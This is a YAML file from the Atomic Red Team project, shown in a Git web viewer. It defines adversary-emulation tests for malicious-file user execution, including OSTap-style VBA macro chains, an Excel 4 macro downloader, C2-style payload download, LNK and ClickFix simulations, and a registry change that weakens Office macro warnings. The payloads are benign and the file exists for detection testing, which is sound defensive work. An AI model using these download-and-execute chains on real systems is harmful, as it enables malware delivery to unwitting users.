security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
python_conversion
atomic-red-team/atomics/T1204.002/T1204.002.yaml
T
Atomic Red Team doc generator f6ef319334 Generated docs from job=generate-docs branch=master [ci skip]
2025-11-01 01:27:30 +00:00

471 lines
23 KiB
YAML
Raw Permalink Blame History

attack_technique: T1204.002
display_name: 'User Execution: Malicious File'
atomic_tests:
- name: OSTap Style Macro Execution
auto_generated_guid: 8bebc690-18c7-4549-bc98-210f7019efff
description: |
This Test uses a VBA macro to create and execute #{jse_path} with cscript.exe. Upon execution, the .jse file launches wscript.exe.
Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-atomicredteam/blob/master/Public/Invoke-MalDoc.ps1) to load and execute VBA code into Excel or Word documents.
This is a known execution chain observed by the OSTap downloader commonly used in TrickBot campaigns.
References:
https://www.computerweekly.com/news/252470091/TrickBot-Trojan-switches-to-stealthy-Ostap-downloader
supported_platforms:
- windows
input_arguments:
jse_path:
description: |
Path for the macro to write out the "malicious" .jse file
type: string
default: C:\Users\Public\art.jse
ms_product:
description: Maldoc application Word or Excel
type: string
default: Word
dependency_executor_name: powershell
dependencies:
- description: |
Microsoft #{ms_product} must be installed
prereq_command: |
try {
New-Object -COMObject "#{ms_product}.Application" | Out-Null
$process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
Stop-Process -Name $process
exit 0
} catch { exit 1 }
get_prereq_command: |
Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
executor:
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
$macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n Shell`$ `"cscript.exe #{jse_path}`"`n"
Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
cleanup_command: |
Remove-Item #{jse_path} -ErrorAction Ignore
name: powershell
- name: OSTap Payload Download
auto_generated_guid: 3f3af983-118a-4fa1-85d3-ba4daa739d80
description: |
Uses cscript //E:jscript to download a file
supported_platforms:
- windows
input_arguments:
script_file:
description: File to execute jscript code from
type: path
default: '%TEMP%\OSTapGet.js'
file_url:
description: URL to retrieve file from
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt
executor:
command: |
echo var url = "#{file_url}", fso = WScript.CreateObject('Scripting.FileSystemObject'), request, stream; request = WScript.CreateObject('MSXML2.ServerXMLHTTP'); request.open('GET', url, false); request.send(); if (request.status === 200) {stream = WScript.CreateObject('ADODB.Stream'); stream.Open(); stream.Type = 1; stream.Write(request.responseBody); stream.Position = 0; stream.SaveToFile('ostapout.txt', 1); stream.Close();} else {WScript.Quit(1);}WScript.Quit(0); > #{script_file}
cscript //E:Jscript #{script_file}
cleanup_command: |
del #{script_file} /F /Q >nul 2>&1
name: command_prompt
- name: Maldoc choice flags command execution
auto_generated_guid: 0330a5d2-a45a-4272-a9ee-e364411c4b18
description: |
This Test uses a VBA macro to execute cmd with flags observed in recent maldoc and 2nd stage downloaders. Upon execution, CMD will be launched.
Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-atomicredteam/blob/master/Public/Invoke-MalDoc.ps1) to load and execute VBA code into Excel or Word documents.
supported_platforms:
- windows
input_arguments:
ms_product:
description: Maldoc application Word or Excel
type: string
default: Word
dependency_executor_name: powershell
dependencies:
- description: |
Microsoft #{ms_product} must be installed
prereq_command: |
try {
New-Object -COMObject "#{ms_product}.Application" | Out-Null
$process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
Stop-Process -Name $process
exit 0
} catch { exit 1 }
get_prereq_command: |
Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
executor:
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
$macrocode = " a = Shell(`"cmd.exe /c choice /C Y /N /D Y /T 3`", vbNormalFocus)"
Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
name: powershell
- name: OSTAP JS version
auto_generated_guid: add560ef-20d6-4011-a937-2c340f930911
description: |
Malicious JavaScript executing CMD which spawns wscript.exe //e:jscript
Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-atomicredteam/blob/master/Public/Invoke-MalDoc.ps1) to load and execute VBA code into Excel or Word documents.
supported_platforms:
- windows
input_arguments:
jse_path:
description: jse file to execute with wscript
type: path
default: C:\Users\Public\art.jse
ms_product:
description: Maldoc application Word or Excel
type: string
default: Word
dependency_executor_name: powershell
dependencies:
- description: |
Microsoft #{ms_product} must be installed
prereq_command: |
try {
New-Object -COMObject "#{ms_product}.Application" | Out-Null
$process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
Stop-Process -Name $process
exit 0
} catch { exit 1 }
get_prereq_command: |
Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
executor:
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
$macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n a = Shell(`"cmd.exe /c wscript.exe //E:jscript #{jse_path}`", vbNormalFocus)`n"
Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
name: powershell
- name: Office launching .bat file from AppData
auto_generated_guid: 9215ea92-1ded-41b7-9cd6-79f9a78397aa
description: Microsoft Office creating then launching a .bat script from an AppData directory. The .bat file launches calc.exe when opened.
supported_platforms:
- windows
input_arguments:
bat_path:
description: Path to malicious .bat file
type: string
default: $("$env:temp\art1204.bat")
ms_product:
description: Maldoc application Word or Excel
type: string
default: Word
dependency_executor_name: powershell
dependencies:
- description: |
Microsoft #{ms_product} must be installed
prereq_command: |
try {
New-Object -COMObject "#{ms_product}.Application" | Out-Null
$process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
Stop-Process -Name $process
exit 0
} catch { exit 1 }
get_prereq_command: |
Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
executor:
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
$macrocode = " Open `"#{bat_path}`" For Output As #1`n Write #1, `"calc.exe`"`n Close #1`n a = Shell(`"cmd.exe /c #{bat_path} `", vbNormalFocus)`n"
Invoke-MalDoc -macroCode $macrocode -officeProduct #{ms_product}
cleanup_command: |
Remove-Item #{bat_path} -ErrorAction Ignore
Get-Process | Where-Object { $_.MainModule.FileName -like "*calculator*" } | Stop-Process
name: powershell
- name: Excel 4 Macro
auto_generated_guid: 4ea1fc97-8a46-4b4e-ba48-af43d2a98052
description: |
This module creates an Excel 4 Macro (XLM) enabled spreadsheet and executes it. The XLM will first write a "malicious"
VBS file to %TEMP%, then execute this file. The VBS will download Process Explorer to the same directory (%TEMP%) and exec.
A note regarding this module. By default, this module will pull the current username from the system and places it into the macro. If
you'd like to utilize the "=GET.WORKSPACE(26)" method, that many maldoc authors use, you will need to ensure that the User Name associated
with Excel matches that of the local system. This username can be found under Files -> Options -> Username
supported_platforms:
- windows
input_arguments:
download_url:
description: Download URL
type: string
default: "https://live.sysinternals.com/procexp.exe"
uname:
description: Username for pathing
type: string
default: $env:Username
dependency_executor_name: powershell
dependencies:
- description: |
Microsoft Excel must be installed
prereq_command: |
try {
New-Object -COMObject "Excel.Application" | Out-Null
Stop-Process -Name "Excel"
exit 0
} catch { exit 1 }
get_prereq_command: |
Write-Host "You will need to install Microsoft Excel manually to meet this requirement"
executor:
command: |
$fname = "$env:TEMP\atomic_redteam_x4m_exec.vbs"
$fname1 = "$env:TEMP\procexp.exe"
if (Test-Path $fname) {
Remove-Item $fname
Remove-Item $fname1
}
$xlApp = New-Object -COMObject "Excel.Application"
$xlApp.Visible = $True
$xlApp.DisplayAlerts = $False
$xlBook = $xlApp.Workbooks.Add()
$sheet = $xlBook.Excel4MacroSheets.Add()
if ("#{uname}" -ne "") {
$sheet.Cells.Item(1,1) = "#{uname}"
} else {
$sheet.Cells.Item(1,1) = "=GET.WORKSPACE(26)"
}
$sheet.Cells.Item(2,1) = "procexp.exe"
$sheet.Cells.Item(3,1) = "atomic_redteam_x4m_exec.vbs"
$sheet.Cells.Item(4,1) = "=IF(ISNUMBER(SEARCH(`"64`",GET.WORKSPACE(1))), GOTO(A5),)"
$sheet.Cells.Item(5,1) = "=FOPEN(`"C:\Users\`"&A1&`"\AppData\Local\Temp\`"&A3&`"`", 3)"
$sheet.Cells.Item(6,1) = "=FWRITELN(A5, `"url = `"`"#{download_url}`"`"`")"
$sheet.Cells.Item(7,1) = "=FWRITELN(A5, `"`")"
$sheet.Cells.Item(8,1) = "=FWRITELN(A5, `"Set winHttp = CreateObject(`"`"WinHTTP.WinHTTPrequest.5.1`"`")`")"
$sheet.Cells.Item(9,1) = "=FWRITELN(A5, `"winHttp.Open `"`"GET`"`", url, False`")"
$sheet.Cells.Item(10,1) = "=FWRITELN(A5, `"winHttp.Send`")"
$sheet.Cells.Item(11,1) = "=FWRITELN(A5, `"If winHttp.Status = 200 Then`")"
$sheet.Cells.Item(12,1) = "=FWRITELN(A5, `"Set oStream = CreateObject(`"`"ADODB.Stream`"`")`")"
$sheet.Cells.Item(13,1) = "=FWRITELN(A5, `"oStream.Open`")"
$sheet.Cells.Item(14,1) = "=FWRITELN(A5, `"oStream.Type = 1`")"
$sheet.Cells.Item(15,1) = "=FWRITELN(A5, `"oStream.Write winHttp.responseBody`")"
$sheet.Cells.Item(16,1) = "=FWRITELN(A5, `"oStream.SaveToFile `"`"C:\Users\`"&A1&`"\AppData\Local\Temp\`"&A2&`"`"`", 2`")"
$sheet.Cells.Item(17,1) = "=FWRITELN(A5, `"oStream.Close`")"
$sheet.Cells.Item(18,1) = "=FWRITELN(A5, `"End If`")"
$sheet.Cells.Item(19,1) = "=FCLOSE(A5)"
$sheet.Cells.Item(20,1) = "=EXEC(`"explorer.exe C:\Users\`"&A1&`"\AppData\Local\Temp\`"&A3&`"`")"
$sheet.Cells.Item(21,1) = "=WAIT(NOW()+`"00:00:05`")"
$sheet.Cells.Item(22,1) = "=EXEC(`"explorer.exe C:\Users\`"&A1&`"\AppData\Local\Temp\`"&A2&`"`")"
$sheet.Cells.Item(23,1) = "=HALT()"
$sheet.Cells.Item(1,1).Name = "runme"
$xlApp.Run("runme")
$xlApp.Quit()
[System.Runtime.Interopservices.Marshal]::ReleaseComObject($xlBook) | Out-Null
[System.Runtime.Interopservices.Marshal]::ReleaseComObject($xlApp) | Out-Null
[System.GC]::Collect()
[System.GC]::WaitForPendingFinalizers()
Remove-Variable xlBook
Remove-Variable xlApp
cleanup_command: |
Stop-Process -Name "procexp*" -ErrorAction Ignore
Remove-Item "$env:TEMP\atomic_redteam_x4m_exec.vbs" -ErrorAction Ignore
Remove-Item "$env:TEMP\procexp.exe" -ErrorAction Ignore
name: powershell
- name: Headless Chrome code execution via VBA
auto_generated_guid: a19ee671-ed98-4e9d-b19c-d1954a51585a
description: |
This module uses Google Chrome combined with ScriptControl to achieve code execution. It spawns a local
webserver hosting our malicious payload. Headless Google Chrome will then reach out to this webserver
and pull down the script and execute it. By default the payload will execute calc.exe on the system.
supported_platforms:
- windows
dependency_executor_name: powershell
dependencies:
- description: |
Microsoft Word must be installed
prereq_command: |
try {
$wdApp = New-Object -COMObject "Word.Application"
Stop-Process -Name "winword"
exit 0 } catch { exit 1 }
get_prereq_command: |
Write-Host "You will need to install Microsoft Word manually to meet this requirement"
- description: |
Google Chrome must be installed
prereq_command: |
try {
$chromeInstalled = (Get-Item (Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe').'(Default)').VersionInfo.FileName
exit 0
} catch { exit 1 }
get_prereq_command: |
Write-Host "You will need to install Google Chrome manually to meet this requirement"
executor:
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1204.002\src\chromeexec-macrocode.txt" -officeProduct "Word" -sub "ExecChrome"
name: powershell
cleanup_command: |
Stop-Process -name mshta
- name: Potentially Unwanted Applications (PUA)
auto_generated_guid: 02f35d62-9fdc-4a97-b899-a5d9a876d295
description: |
The Potentially Unwanted Applications (PUA) protection feature in antivirus software can identify and block PUAs from downloading and installing on endpoints in your network. These applications are not considered viruses, malware, or other types of threats, but might perform actions on endpoints that adversely affect their performance or use. This file is similar to EICAR test virus file, but is considered a Potentially Unwanted Application (PUA) instead of a VIRUS (i.e. not actually malicious, but is flagged as it to verify anti-pua protection).
supported_platforms:
- windows
input_arguments:
pua_url:
description: url to PotentiallyUnwanted.exe
type: url
default: "http://amtso.eicar.org/PotentiallyUnwanted.exe"
pua_file:
description: path to PotentiallyUnwanted.exe
type: path
default: "$env:TEMP/PotentiallyUnwanted.exe"
executor:
name: powershell
elevation_required: false
command: |
Invoke-WebRequest #{pua_url} -OutFile #{pua_file}
& "#{pua_file}"
cleanup_command: |
Stop-Process -name PotentiallyUnwanted
Remove-Item #{pua_file} -ErrorAction Ignore
- name: Office Generic Payload Download
auto_generated_guid: 5202ee05-c420-4148-bf5e-fd7f7d24850c
description: |
This Test uses a VBA macro to launch Powershell which will download a file from a user defined web server.
Required input agruments are c2_domain and file_name
Execution is handled by [Invoke-MalDoc](https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1) to load and execute VBA code into Excel or Word documents.
Example for c2 server located at 127.0.0.1 for the file test.txt which is nested below the parent directory in the tests/my-test folder
Example input args for file in root directory c2-domain = 127.0.0.1, file-name = test.txt
supported_platforms:
- windows
input_arguments:
macro_path:
description: |
Location of file which will be converted to a VBA macro
type: path
default: PathToAtomicsFolder/T1204.002/src/test9-GenericPayloadDownload.txt
c2_domain:
description: |
This required variable points to a user defined HTTP server that will host the file_name in the c2_parent_directory.
type: url
default:
c2_parent_directory:
description: |
Parent directory where you have the "malicious" file on c2_domain server.
Will default to root directory. Forward slashes are not needed at begining or ending of directory path
type: path
default: ""
file_name:
description: |
"Malicious" file to be downloaded.
This required file needs to be place on the user provided c2 domain
Example file can be found at PathToAtomicsFolder/T1204.002/src/test9-example-payload.txt
type: string
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/test9-example-payload.txt
ms_product:
description: |
Maldoc application Word or Excel
type: string
default: Word
dependency_executor_name: powershell
dependencies:
- description: |
Destination c2_domain name or IP address must be set to a running HTTP server.
prereq_command: |
if (#{c2_domain}) (exit 0) else (exit 1)
get_prereq_command: |
Write-Host "Destination c2 server domain name or IP address must be set and reachable for HTTP service"
- description: |
Microsoftt #{ms_product} must be installed
prereq_command: |
try {
New-Object -COMObject "#{ms_product}.Application" | Out-Null
$process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
Stop-Process -Name $process
exit 0
} catch { exit 1 }
get_prereq_command: |
Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
executor:
name: powershell
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
$macroCode = Get-Content "#{macro_path}" -Raw
$URL = "#{c2_domain}" + "/" + "#{c2_parent_directory}"
$macroCode = $macroCode -replace 'serverPath', $URL -replace 'fileName', "#{file_name}"
Invoke-MalDoc -macroCode $macroCode -officeProduct "#{ms_product}"
cleanup_command: |
Remove-Item "C:\Users\$env:username\Desktop\#{file_name}" -ErrorAction Ignore
- name: LNK Payload Download
auto_generated_guid: 581d7521-9c4b-420e-9695-2aec5241167f
description: This lnk files invokes powershell to download putty from the internet and opens the file. https://twitter.com/ankit_anubhav/status/1518932941090410496
supported_platforms:
- windows
executor:
command: |
Invoke-WebRequest -OutFile $env:Temp\test10.lnk "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/bin/test10.lnk"
$file1 = "$env:Temp\test10.lnk"
Start-Process $file1
Start-Sleep -s 10
taskkill /IM a.exe /F
cleanup_command: |-
$file1 = "$env:Temp\test10.lnk"
$file2 = "$env:Temp\a.exe"
Remove-Item $file1 -ErrorAction Ignore
Remove-Item $file2 -ErrorAction Ignore
name: powershell
- name: Mirror Blast Emulation
auto_generated_guid: 24fd9719-7419-42dd-bce6-ab3463110b3c
description: |
Emulates the JS -> MSI chain of the MirrorBlast T505 campaign by executing an xlsm file designed.
Requires the 32 bit version of Office to run. [MirrorBlast Campaign Analysis](https://blog.morphisec.com/explosive-new-mirrorblast-campaign-targets-financial-companies)
supported_platforms:
- windows
executor:
command: |-
Cd "C:\ProgramData\Microsoft\Windows\Start Menu\Programs"
New-ItemProperty -Path Registry::HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Excel\Security -Name "VBAWarnings" -Value "1" -PropertyType DWORD -Force | Out-Null
& '.\Excel 2016.lnk' "PathToAtomicsFolder\T1204.002\bin\mirrorblast_emulation.xlsm"
cleanup_command: reg delete "HKCU\SOFTWARE\Microsoft\Office\16.0\Excel\Security" /v "VBAWarnings" /f
name: powershell
- name: ClickFix Campaign - Abuse RunMRU to Launch mshta via PowerShell
auto_generated_guid: 3f3120f0-7e50-4be2-88ae-54c61230cb9f
description: |
Simulates a ClickFix-style campaign by adding a malicious entry to the RunMRU registry key that launches `mshta.exe` with a remote payload.
This technique relies on user interaction (Win+R + Enter) to trigger execution.
Used in social engineering campaigns that aim to bypass traditional startup methods.
Reference: https://www.netskope.com/blog/lumma-stealer-fake-captchas-new-techniques-to-evade-detection
supported_platforms:
- windows
executor:
command: |-
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name "atomictest" -Value '"C:\Windows\System32\mshta.exe" http://localhost/hello6.hta'
cleanup_command: |-
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name "atomictest" -ErrorAction SilentlyContinue
name: powershell
- name: Simulate Click-Fix via Downloaded BAT File
auto_generated_guid: 22386853-f68d-4b50-a362-de235127c443
description: Simulates user execution of a BAT file downloaded from the Atomic Red Team GitHub repository.This test represents T1204.002 - User Execution via Malicious File.The BAT file performs harmless terminal output to simulate a "fix" operation.
supported_platforms:
- windows
input_arguments:
url:
description: URL to download the BAT file from
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/click-fix.bat
outfile:
description: Path where the BAT file will be saved
type: path
default: $env:TEMP\click-fix.bat
executor:
command: |
$url = "#{url}"
$outfile = "#{outfile}"
Invoke-WebRequest -Uri $url -OutFile $outfile -UseBasicParsing
$process = Start-Process -FilePath $outfile -PassThru -WindowStyle Normal
$process.Id | Out-File "$env:TEMP\click-fix-pid.txt"
cleanup_command: |
if (Test-Path "$env:TEMP\click-fix-pid.txt") {
$pid = Get-Content "$env:TEMP\click-fix-pid.txt"
Stop-Process -Id $pid -Force -ErrorAction SilentlyContinue
Remove-Item "$env:TEMP\click-fix-pid.txt" -ErrorAction SilentlyContinue
}
Remove-Item "#{outfile}" -ErrorAction SilentlyContinue
name: powershell
elevation_required: false
Reference in New Issue View Git Blame Copy Permalink